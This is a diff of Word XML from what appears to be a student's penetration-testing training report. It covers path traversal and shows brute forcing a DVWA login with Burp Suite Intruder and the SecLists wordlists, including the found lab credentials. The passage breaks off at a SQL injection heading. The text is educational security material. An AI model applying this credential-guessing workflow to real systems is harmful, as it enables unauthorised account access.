+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="en-AS"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="8" w:name="_Toc113747829"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+        </w:rPr>
+        <w:t>Path Traversal</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="8"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Moving to the real pen testing, we started the second week with a class for path traversal. It is </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>when you study what is a specific system and then be able to know the file names and where sensitive data might be stored, you can navigate to the system files until you reach some private data.</w:t>
       </w:r>
@@ -1577,131 +3830,169 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Also, you could get to trick the terminal that you are someone else and execute commands on behalf of them. </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+        <w:pStyle w:val="Heading3"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc113407014"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc113747830"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
         <w:t>Brute Force</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Brute force is when the attacker </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">guesses the username/password to log into places they do not have access for. The way I would do this is </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">by </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">sending the POST request to Burp Suite to adjust the inputs as I desire. Burp Suite has many methods that have several purposes. For instance, Intruder is to specify a payload that you want to try </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>so many inputs in that payload, and when</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> burp suite returns</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">a 200 status for the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>input (what the attacker guessed)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>,</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> mean</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>s</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> that the input was successful. Other way to know that the input is successful is by looking at the length as the </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>correct</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> input differs from the others. </w:t>
       </w:r>
@@ -1710,11 +4001,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>There are hundreds of username/password files that are available to make it easier for the pen tester to use instead of having to type the common username/passwords, you can just use these wordlists(/</w:t>
       </w:r>
@@ -1722,6 +4017,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>usr</w:t>
       </w:r>
@@ -1729,6 +4026,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>/share/</w:t>
       </w:r>
@@ -1736,6 +4035,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>secLists</w:t>
       </w:r>
@@ -1743,6 +4044,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">/), or you can find many other files on the internet. </w:t>
       </w:r>
@@ -1751,19 +4054,26 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Let’s</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve"> get back to brute forcing, when capturing the request on Burp Suite, we should right-click and “Send to Intruder”. </w:t>
       </w:r>
@@ -1771,6 +4081,8 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E346428" wp14:editId="31416689">
@@ -1826,17 +4138,23 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">Then navigate to Intruder tab to specify the payloads that you want to test. </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">For example, $username$(payload 1) and $password$(payload 2). </w:t>
       </w:r>
@@ -1846,12 +4164,16 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Start the attack and when there is a correct payload you would know by comparing to other inputs.</w:t>
       </w:r>
@@ -1861,6 +4183,8 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1869,14 +4193,17 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="205062BA" wp14:editId="08A92745">
             <wp:extent cx="5725160" cy="3267710"/>
@@ -1932,6 +4259,8 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -1940,13 +4269,18 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
-        </w:rPr>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79A73523" wp14:editId="03047995">
             <wp:extent cx="5732780" cy="3275965"/>
@@ -2002,6 +4336,8 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -2010,12 +4346,16 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>There are many Intruder methods. Such as, Sniper, Battering ram, Pitchfork, Cluster bomb.</w:t>
       </w:r>
@@ -2025,12 +4365,16 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">You can choose one of them considering you situation. </w:t>
       </w:r>
@@ -2039,21 +4383,26 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D424DFA" wp14:editId="413CAB98">
             <wp:extent cx="5725160" cy="1304290"/>
@@ -2108,28 +4457,52 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>DVWA Exercise</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-      </w:pPr>
-      <w:r>
+        <w:pStyle w:val="Heading4"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve">Brute </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t>Forcce</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
         <w:t xml:space="preserve"> – Low level</w:t>
       </w:r>
     </w:p>
@@ -2137,17 +4510,23 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">The correct answer </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>is:</w:t>
       </w:r>
@@ -2156,11 +4535,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Username: admin</w:t>
       </w:r>
@@ -2169,11 +4552,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t>Password: password</w:t>
       </w:r>
@@ -2182,11 +4569,15 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">You can notice it is the one that differs from others. I decided to filter the outputs as if they </w:t>
@@ -2194,6 +4585,8 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:t xml:space="preserve">cause error and the correct answer is the only option that does not. </w:t>
       </w:r>
@@ -2201,6 +4594,8 @@
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="424EB49C" wp14:editId="6F8BF6A0">
@@ -2256,19 +4651,25 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
         <w:drawing>
@@ -2325,19 +4726,25 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
           <w:noProof/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47EADFF6" wp14:editId="71611608">
@@ -2393,51 +4800,57 @@
       <w:pPr>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="10" w:name="_Toc113747831"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi"/>
         </w:rPr>
         <w:t>SQL injection</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cstheme="majorBidi"/>
-        </w:rPr>
-        <w:t>This meth</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
